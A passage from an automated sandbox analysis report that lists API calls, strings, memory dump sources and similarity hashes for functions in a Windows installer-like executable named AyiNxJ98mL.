                                                              • FindNextFileA.KERNEL32(000000FF,?,00000000,00497B8A,?,00000000,?,00000000,00497BB2,?,?,00000000,0049B628,?,00497D3C,00000000), ref: 00497B66
                                                              • FindClose.KERNEL32(000000FF,00497B91,00497B8A,?,00000000,?,00000000,00497BB2,?,?,00000000,0049B628,?,00497D3C,00000000,00497D90), ref: 00497B84
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: FileFind$AttributesCloseFirstNext
                                                              • String ID: isRS-$isRS-???.tmp
                                                              • API String ID: 134685335-3422211394
                                                              • Opcode ID: ba647548f34564e7f56f6c808fa7faec3af05a969934c2433d5159a38f0bbcda
                                                              • Instruction ID: b2847bb1a44685988a55541ee7ac685ebeb66ffb5e30493f66813578f7a68db2
                                                              • Opcode Fuzzy Hash: ba647548f34564e7f56f6c808fa7faec3af05a969934c2433d5159a38f0bbcda
                                                              • Instruction Fuzzy Hash: A63165719146186FCF10EF65CC41ADEBBBCDB45318F5084F7A808A32A1E638AE458F58
                                                              APIs
                                                              • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457449
                                                              • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457470
                                                              • SetForegroundWindow.USER32(?), ref: 00457481
                                                              • NtdllDefWindowProc_A.USER32(00000000,?,?,?,00000000,0045775B,?,00000000,00457797), ref: 00457746
                                                              Strings
                                                              • Cannot evaluate variable because [Code] isn't running yet, xrefs: 004575C6
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: MessagePostWindow$ForegroundNtdllProc_
                                                              • String ID: Cannot evaluate variable because [Code] isn't running yet
                                                              • API String ID: 2236967946-3182603685
                                                              • Opcode ID: fe95ac23089f8abddac86e3d9ae11b4981b9e88786854755ce7e63a50dbcddc8
                                                              • Instruction ID: 5bc10c0d354cae83c82450a0913647aad13fd3ad71d4eb48676ad76960377df7
                                                              • Opcode Fuzzy Hash: fe95ac23089f8abddac86e3d9ae11b4981b9e88786854755ce7e63a50dbcddc8
                                                              • Instruction Fuzzy Hash: D9910034608204EFD715CF54E991F5ABBF9EB89305F2180BAED0897792D638AE04DF58
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA,00000000,00455F37), ref: 00455E28
                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00455E2E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleModuleProc
                                                              • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                              • API String ID: 1646373207-3712701948
                                                              • Opcode ID: b5f149e20a31f3d313834126475bcf244ddb8ed42aa7b007c000aa6233a22d25
                                                              • Instruction ID: 12dfdd1b414f9b5fa57bb507e68127e36b1c1a940f154b23c6ee37fdedd7ee09
                                                              • Opcode Fuzzy Hash: b5f149e20a31f3d313834126475bcf244ddb8ed42aa7b007c000aa6233a22d25
                                                              • Instruction Fuzzy Hash: 66415171A04649AFCF01EFA5C8929EFB7B8EF49304F508566F800F7252D6785E09CB69
                                                              APIs
                                                              • IsIconic.USER32(?), ref: 00417D1F
                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D3D
                                                              • GetWindowPlacement.USER32(?,0000002C), ref: 00417D73
                                                              • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D9A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Window$Placement$Iconic
                                                              • String ID: ,
                                                              • API String ID: 568898626-3772416878
                                                              • Opcode ID: 419626ddcb93f619c016e5eb608395eb97e33a9638738bd346f5ce49c9230b00
                                                              • Instruction ID: 117db6d3727d0f94901dea8748b8d47281c3d2add8a8e77c7f929e434730b1f7
                                                              • Opcode Fuzzy Hash: 419626ddcb93f619c016e5eb608395eb97e33a9638738bd346f5ce49c9230b00
                                                              • Instruction Fuzzy Hash: 41213171604208ABCF40EF69E8C0EEA77B8AF49314F05456AFD18DF246C678DD84CB68
                                                              APIs
                                                              • SetErrorMode.KERNEL32(00000001,00000000,00464205), ref: 00464079
                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,004641D8,?,00000001,00000000,00464205), ref: 00464108
                                                              • FindNextFileA.KERNEL32(000000FF,?,00000000,004641BA,?,00000000,?,00000000,004641D8,?,00000001,00000000,00464205), ref: 0046419A
                                                              • FindClose.KERNEL32(000000FF,004641C1,004641BA,?,00000000,?,00000000,004641D8,?,00000001,00000000,00464205), ref: 004641B4
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Find$File$CloseErrorFirstModeNext
                                                              • String ID:
                                                              • API String ID: 4011626565-0
                                                              • Opcode ID: ae980c7907389dfafffe65f94222ffd443bde6570b10391f97ae33023227fa5d
                                                              • Instruction ID: 2652c2d8e8669354d55d474f1d59e7b06630ff05c6329d0403030a32038cf055
                                                              • Opcode Fuzzy Hash: ae980c7907389dfafffe65f94222ffd443bde6570b10391f97ae33023227fa5d
                                                              • Instruction Fuzzy Hash: 1E418770A00618AFCF10EF65DC55ADEB7B8EB89705F5044BAF804E7381E67C9E848E59
                                                              APIs
                                                              • SetErrorMode.KERNEL32(00000001,00000000,004646AB), ref: 00464539
                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,00464676,?,00000001,00000000,004646AB), ref: 0046457F
                                                              • FindNextFileA.KERNEL32(000000FF,?,00000000,00464658,?,00000000,?,00000000,00464676,?,00000001,00000000,004646AB), ref: 00464634
                                                              • FindClose.KERNEL32(000000FF,0046465F,00464658,?,00000000,?,00000000,00464676,?,00000001,00000000,004646AB), ref: 00464652
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Find$File$CloseErrorFirstModeNext
                                                              • String ID:
                                                              • API String ID: 4011626565-0
                                                              • Opcode ID: 8a1b155a3f91a4aa9fbf35308e738363c59e35d7d54ec670dc4b6b29b87b573a
                                                              • Instruction ID: 7635123f594c8b6db569002a9bb01bf8fa96c74c2cf80da52efac59b167f1e7c
                                                              • Opcode Fuzzy Hash: 8a1b155a3f91a4aa9fbf35308e738363c59e35d7d54ec670dc4b6b29b87b573a
                                                              • Instruction Fuzzy Hash: D8416171A00A18EBCB10EFA5CC959DEB7B9EB88305F4044AAF804A7351E77C9E448E59
                                                              APIs
                                                              • CreateFileA.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F2B,00000000,00452F4C), ref: 0042E966
                                                              • DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 0042E991
                                                              • GetLastError.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F2B,00000000,00452F4C), ref: 0042E99E
                                                              • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F2B,00000000,00452F4C), ref: 0042E9A6
                                                              • SetLastError.KERNEL32(00000000,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F2B,00000000,00452F4C), ref: 0042E9AC
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$CloseControlCreateDeviceFileHandle
                                                              • String ID:
                                                              • API String ID: 1177325624-0
                                                              • Opcode ID: db388d08dfb8c48f2ab297580a8778080e815d8e8b0b37ff587e49df53ef3670
                                                              • Instruction ID: 40e29ed62a0e901db822078ff48c294e58af048427126d47a83bbc7ee0829aa9
                                                              • Opcode Fuzzy Hash: db388d08dfb8c48f2ab297580a8778080e815d8e8b0b37ff587e49df53ef3670
                                                              • Instruction Fuzzy Hash: 4BF090B23A17207AF620B57A6C86F7F418CC785B68F10823BBB04FF1C1D9A85D05556D
                                                              APIs
                                                              • IsIconic.USER32(?), ref: 004833FA
                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 00483418
                                                              • ShowWindow.USER32(00000000,00000005,00000000,000000F0,0049C0A4,004828DE,00482912,00000000,00482932,?,?,?,0049C0A4), ref: 0048343A
                                                              • ShowWindow.USER32(00000000,00000000,00000000,000000F0,0049C0A4,004828DE,00482912,00000000,00482932,?,?,?,0049C0A4), ref: 0048344E
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Window$Show$IconicLong
                                                              • String ID:
                                                              • API String ID: 2754861897-0
                                                              • Opcode ID: 26f2524beb83a1697fb2f3c3d4c3f5548a09f48141019de32dcd2365822c4b68
                                                              • Instruction ID: 9902e76ed030cf172564c6423cfc444f456bf65fce7539c2ce1f68efba32f602
                                                              • Opcode Fuzzy Hash: 26f2524beb83a1697fb2f3c3d4c3f5548a09f48141019de32dcd2365822c4b68
                                                              • Instruction Fuzzy Hash: 4D017134A452019EEB11BBA5DD8AB5B27C45F10B09F08083BB9029F2A3CB6D9D41D71C
                                                              APIs
                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,00462B90), ref: 00462B14
                                                              • FindNextFileA.KERNEL32(000000FF,?,00000000,00462B70,?,00000000,?,00000000,00462B90), ref: 00462B50
                                                              • FindClose.KERNEL32(000000FF,00462B77,00462B70,?,00000000,?,00000000,00462B90), ref: 00462B6A
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Find$File$CloseFirstNext
                                                              • String ID:
                                                              • API String ID: 3541575487-0
                                                              • Opcode ID: f304b7e405ec9403326d096206e821460da1cdcff9736e6297f3d959ba5c8769
                                                              • Instruction ID: 0f193a6fcf1d943c675bf75123405c31ceeb2ecab595186adb6c93933d2a98b0
                                                              • Opcode Fuzzy Hash: f304b7e405ec9403326d096206e821460da1cdcff9736e6297f3d959ba5c8769
                                                              • Instruction Fuzzy Hash: 7121D871904B087EDB11DF65CC51ADEBBACDB49704F5084F7E808E31A1E6BCAE44CA5A
                                                              APIs
                                                              • IsIconic.USER32(?), ref: 004241F4
                                                              • SetActiveWindow.USER32(?,?,?,0046CFFB), ref: 00424201
                                                                • Part of subcall function 0042365C: ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677
                                                                • Part of subcall function 00423B24: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,021125AC,0042421A,?,?,?,0046CFFB), ref: 00423B5F
                                                              • SetFocus.USER32(00000000,?,?,?,0046CFFB), ref: 0042422E
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Window$ActiveFocusIconicShow
                                                              • String ID:
                                                              • API String ID: 649377781-0
                                                              • Opcode ID: 362a53b09b72621cbce2071a633a460a23dddc7e90100e91eac1f534d9fc78be
                                                              • Instruction ID: 85e094fd83fda52d6ba69bb43f194f943737e29f022f28d5c3d7585fd8a6de7d
                                                              • Opcode Fuzzy Hash: 362a53b09b72621cbce2071a633a460a23dddc7e90100e91eac1f534d9fc78be
                                                              • Instruction Fuzzy Hash: ECF03A717001208BDB10EFAAA8C4B9662A8EF48344B5500BBBC09DF34BCA7CDC0187A8
                                                              APIs
                                                              • IsIconic.USER32(?), ref: 00417D1F
                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D3D
                                                              • GetWindowPlacement.USER32(?,0000002C), ref: 00417D73
                                                              • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D9A
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Window$Placement$Iconic
                                                              • String ID:
                                                              • API String ID: 568898626-0
                                                              • Opcode ID: e9f294a83204c688928c4c422749f875b3ddc518ff0edd6358ab4a317cb2701d
                                                              • Instruction ID: b3485382f52430a3de90e88073d2477855dbbaeb9eeee9907b508ce44eeb6dab
                                                              • Opcode Fuzzy Hash: e9f294a83204c688928c4c422749f875b3ddc518ff0edd6358ab4a317cb2701d
                                                              • Instruction Fuzzy Hash: 02017C31204108ABDB10EE69E8C1EEA73A8AF45324F054567FD08CF242D639ECC087A8
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: CaptureIconic
                                                              • String ID:
                                                              • API String ID: 2277910766-0
                                                              • Opcode ID: 9fb93b599f870259b4000da7575617f39aed9b1e5bccbb5d02bb51a51f71ab84
                                                              • Instruction ID: edcb67aebd7cb7e0e4c3241a821d6ac110e093164443c601d5aebb18a23c44a8
                                                              • Opcode Fuzzy Hash: 9fb93b599f870259b4000da7575617f39aed9b1e5bccbb5d02bb51a51f71ab84
                                                              • Instruction Fuzzy Hash: A2F04F32304A028BDB21A72EC885AEB62F5DF84368B14443FE415CB765EB7CDCD58758
                                                              APIs
                                                              • IsIconic.USER32(?), ref: 004241AB
                                                                • Part of subcall function 00423A94: EnumWindows.USER32(00423A2C), ref: 00423AB8
                                                                • Part of subcall function 00423A94: GetWindow.USER32(?,00000003), ref: 00423ACD
                                                                • Part of subcall function 00423A94: GetWindowLongA.USER32(?,000000EC), ref: 00423ADC
                                                                • Part of subcall function 00423A94: SetWindowPos.USER32(00000000,lAB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241BB,?,?,00423D83), ref: 00423B12
                                                              • SetActiveWindow.USER32(?,?,?,00423D83,00000000,0042416C), ref: 004241BF
                                                                • Part of subcall function 0042365C: ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Window$ActiveEnumIconicLongShowWindows
                                                              • String ID:
                                                              • API String ID: 2671590913-0
                                                              • Opcode ID: dcd3cf20cd52624e3855be4655b1b3d00803fdb590b5af4931fd0619bf418583
                                                              • Instruction ID: ffd443eaca36288e12b0fd3e34cf0737071334a0f5e631569de285e60205db71
                                                              • Opcode Fuzzy Hash: dcd3cf20cd52624e3855be4655b1b3d00803fdb590b5af4931fd0619bf418583
                                                              • Instruction Fuzzy Hash: 02E0E5A470010187EF00EFAAD8C9B9662A9AB48304F55057ABC08CF24BDA78C954C724
                                                              APIs
                                                              • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,004127E5), ref: 004127D3
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: NtdllProc_Window
                                                              • String ID:
                                                              • API String ID: 4255912815-0
                                                              • Opcode ID: c048b5060f638d2d21f70beb9f23f52c1df829a0825c59c0675cf40435b3c9a3
                                                              • Instruction ID: 2af12fea25256c3ae9471bae8fd4feed52cec15eb5e351c91de8273fd3ce68b3
                                                              • Opcode Fuzzy Hash: c048b5060f638d2d21f70beb9f23f52c1df829a0825c59c0675cf40435b3c9a3
                                                              • Instruction Fuzzy Hash: 055106316082058FD710DB6AD681A9BF3E5FF98304B2482BBD814C7392D7B8EDA1C759
                                                              APIs
                                                              • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 00478B2A
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: NtdllProc_Window
                                                              • String ID:
                                                              • API String ID: 4255912815-0
                                                              • Opcode ID: 9f19c8960208bf84e0a1f031f05f2c13e84af91581ae166fbadb947181b78a5a
                                                              • Instruction ID: 518aae51b6d6b411e39a58dd47dc5b2362a2c83c3bfed1ee6c3543fdde473bb3
                                                              • Opcode Fuzzy Hash: 9f19c8960208bf84e0a1f031f05f2c13e84af91581ae166fbadb947181b78a5a
                                                              • Instruction Fuzzy Hash: 04413775644104DFCB10CF99C6898AAB7F5FB48310B74CA9AE848DB705DB38EE41DB54
                                                              APIs
                                                              • ArcFourCrypt._ISCRYPT(?,?,?,?), ref: 0045D5AB
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: CryptFour
                                                              • String ID:
                                                              • API String ID: 2153018856-0
                                                              • Opcode ID: 47a938482607ff708c7ba3b07c2d2a6c765e1a89700bf01dade5fb09ed1c08ae
                                                              • Instruction ID: 2e238a974be0c8424367b3c35ccc205e7f0a308c5ec670be841bb4718b7179ff
                                                              • Opcode Fuzzy Hash: 47a938482607ff708c7ba3b07c2d2a6c765e1a89700bf01dade5fb09ed1c08ae
                                                              • Instruction Fuzzy Hash: 37C09BF200420CBF660057D5ECC9C77B75CF6586547508126F6048210195726C104574
                                                              APIs
                                                              • ArcFourCrypt._ISCRYPT(?,00000000,00000000,000003E8,0046DDBC,?,0046DF9D), ref: 0045D5BE
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
